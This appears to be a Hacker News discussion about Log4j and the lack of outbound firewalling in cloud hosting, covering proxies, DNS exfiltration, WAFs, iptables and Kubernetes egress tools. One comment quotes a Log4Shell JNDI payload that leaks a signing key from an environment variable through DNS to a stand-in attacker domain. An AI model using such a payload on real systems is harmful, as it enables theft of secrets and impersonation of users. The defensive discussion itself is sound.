There’s a ton of stuff on HN which is just ads for SaaS companies, at least this is new and different. It’s might also be something many are interested in, in light of the Log4j exploit. It would have help me a great deal.
With everyone using un-curated package managers such as NPM and PiPy there is also the chance of a package being compromised. At least if we had outbound firewalls it could help mitigate these problems.
It seems to me that there is an incredible opportunity for someone with the right background to build this (I wish it was me). I tend to use PAASs like Heroku for my apps and would love it if this was built in! They even know (most of) what other infrastructure my apps talk to. Why is it not part of Docker?
(Obviously everyone should already be using inbound WAF such as CloudFlare)
Machines in the legacy data center didn’t have internet access, and so they didn’t want could machines to have it either.
But once we locked down the network so many things broke. Not just user level stuff like doing code builds in maven, but also machine level stuff like enabling drive encryption.
Preventing out of band exfiltration on of data and downloading of exploit materials is very important to a defence in depth approach and none of the clouds seem to embrace it.
The problem was that all azure services were provided on public IP ranges, so given them at VM services needed to communicate with azure Ana gent endpoints we couldn’t block on the IP, so had to implement via HTTP proxies.
Using explicit HTTP proxies was a config night mare as not everything honoured the HTTPS_PROXY env var (e.g. Java). And using an implicit proxy was a nightmare of MITM, custom certs, updating a myriad of trust roots and then the proxy would use a ‘captive portal’ and cause broken redirects.
Little Snitch as an example of UX in this area is perfect as you can run it for a while first to see what is connecting to what, then start looking down everything else.
However, you’d still show up as vulnerable here. This is because even with proper egress filters many systems will default resolve DNS out to the internet. Some people fix this too, by running restricted local DNS servers at another privilege level. But if DNS is your only way out, the worst impact I’ve seen so far is info disclosure - I have not seen RCE possible with this bug when a normal firewall is set up. But hackers are creative so I am keeping an eye out.
Some places do. The systems I deal with definitely do, and it’s common in banking and card payment systems (PCI DSS has strict firewall requirements). Even our non payment systems we still restrict outbound access.
I think it comes down more to what focus your organisation has. Especially how important security plays in it.
This is also why I hate third party APIs that can’t be firewalled by IP/subnet but only by domain. Especially those operating behind a cloud load balancer like AWS ELB, because they are extremely/impossibly difficult to firewall without introducing risk of permitting access to other services also using the load balancer. Dealing with HTTP/HTTPS proxies is a pain and introduces yet another attack vector.
Not really, but it's important to keep in mind that these kinds of things are less effective than you might imagine. E.g. using the system resolver wouldn't be covered by a firewall in most configurations, so this doesn't help you for an exploit like ${jndi:ldap://${env:AUTH_COOKIE_SIGNING_KEY}.attackercontrolleddns.com} followed by impersonating any user.
Even if you correctly lock down the application server networks and nodes, I'd be surprised to find a restricted DNS resolver in place. It's a good idea for sure, but I'd expect it to be very rarely done. Not least because "exfiltrate data over DNS" is probably not a well-known vector.
> (Obviously everyone should already be using inbound WAF such as CloudFlare)
How is this obvious? This is not a trivial matter.
By using a WAF you are explicitly blocking many standard hacking attempts such as SQLi. At least it seems obvious to me to take the precaution of having one, you can never trust that your code or the library’s you use don’t have security holes.
By using a hosted or managed WAF it means when there is a new venerability found (such as Log4Shel) the service updates the rules and you have a level of mitigation before even patching your system or even being aware of it.
The solution we ended up implementing was to run the scraper through a local HTTP proxy, block all other connections, then use the proxy's config to whitelist the site by the Host header. This, of course, meant doing SSL stripping on the proxy, which was only acceptable because the proxy was ours. If a hosting provider suggested something like this we'd laugh them away.
My current company is using Cilium (and CNPs) within Kubernetes to solve for this, although it does have some issues. Calico has fqdn filtering in it's "Pro" versions.
For covering a whole VPC you can look at AWS's Route53 DNS Resolver Firewall (which sort of addresses the same class of concerns. There are gateway's that will address this at a VPC level too (probably the best solution) like Aviatrix or Chaser Systems' "discriminNAT".
The point is that there are solutions for this, just the UX around managing them could be a lot better, and at the current price point isn't worth the risk for the fast majority of projects.
https://expeditedsecurity.com/heroku/how-to-block-log4j-vuln...
Black hole routing is often used in some more regulated industries (finance):
* https://en.wikipedia.org/wiki/Black_hole_(networking)
There's overhead in setting up proxies and telling all software to use them (browsers can be somewhat automated with proxy auto-config (PAC) files). You could of course just use this technique on your server infrastructure.
But it's a 'non-standard' configuration in a world where everything assumes universal connectivity to everything else.
One interesting idea I've seen mentioned it running a firewall on the system itself on a per-UID basis:
* https://www.cyberciti.biz/tips/block-outgoing-network-access...
So if your have a "www-data" UID that runs the web server, you set up iptables to allow it to answer incoming connections and produce replies, but not generate new connections.
> A web server mostly accepts connections but usually only needs to initiate very few connections itself. Therefore it makes sense to limit the possible outgoing connections to what is actually needed. This makes it much more difficult for an attacker to do harm once he has exploited some web application.
* https://wiki.debian.org/Apache/Hardening#Restrict_outgoing_c...
So if you are compromised with attack code, one of the first things it tends to do is fetch some more advanced code to start rummaging through your system(s): that fetch is potentially blocked because it's a new connection to the malware hosting server (or the C&C server).
But for a server app (which you built and manage) where you are only talking to known endpoints everything else should be blocked, but we don’t do it. We all use platforms for our apps where anything we use could be compromised and connect to the outside world!
And of course, in this case it only takes one app using this library that has a legitimate use case for unlimited acces. Unless you find a way to limit libraries separately.
It’s also invite to solve a problem so it’s not a lot of work. It should be easy to secure your systems from making outbound connection.
The issue is that many have come to expect NAT or public IPs as default on their cloud infrastructure and firewalls would result in to many support cases.
As a C developer, I disagree with the assertion that Java is a mature language. It's only 26 years old! (And in a practical sense even younger than that, since it has changed a lot since the early versions.)
js/npm really desirves it, I lost many hours last week because the shitty philosophy of spiting things not in libraries but in mainly functions and add on top of that packages with incorrect package.json, packages that depend on git repositories or shit where package X is bugged on node version Y so you should upgrade node but if I upgrade node then package W is now incompatible. (I inherited this project os is not my fault it uses outdated stuff or shit that is not longer cool).
With this Java log library it seems it does logging and you don't need also a leftpad and isOdd to have it working, some other library that just defines colors, some other library that changes the output from plain text to csv etc.
IMO using 1 lib for logging, 1 for unit tests, 1 for db access, 1 for http, 1 for GUI makes sense , what is stupid is if this 5 libraries combined will depend on 100+ libraries , we need to push against this since the npm philosophy and CV driven development is spreading.
[1] https://github.com/airsonic-advanced/airsonic-advanced/issue...
If we’re feeling particularly lazy we might even just do mvn dependency:tree
Note that non-affected JVMs are still vulnerable to other issues triggered by that resolution process, just not as bad as loading untrusted remote objects. So you should upgrade log4j2 even if you use a non-vulnerable JVM.
If your app depends on compiled libraries, then the build-time options used to construct the library are as important as version and checksum information.
I see this a lot on HN and the links here - lots of developers for whom a "dependency" is literally a file of non-compiled code, and thus not subject to changes in behavior unless edited. This is not true for compiled languages (and, for all I know, might not even be true for some non-compiled languages).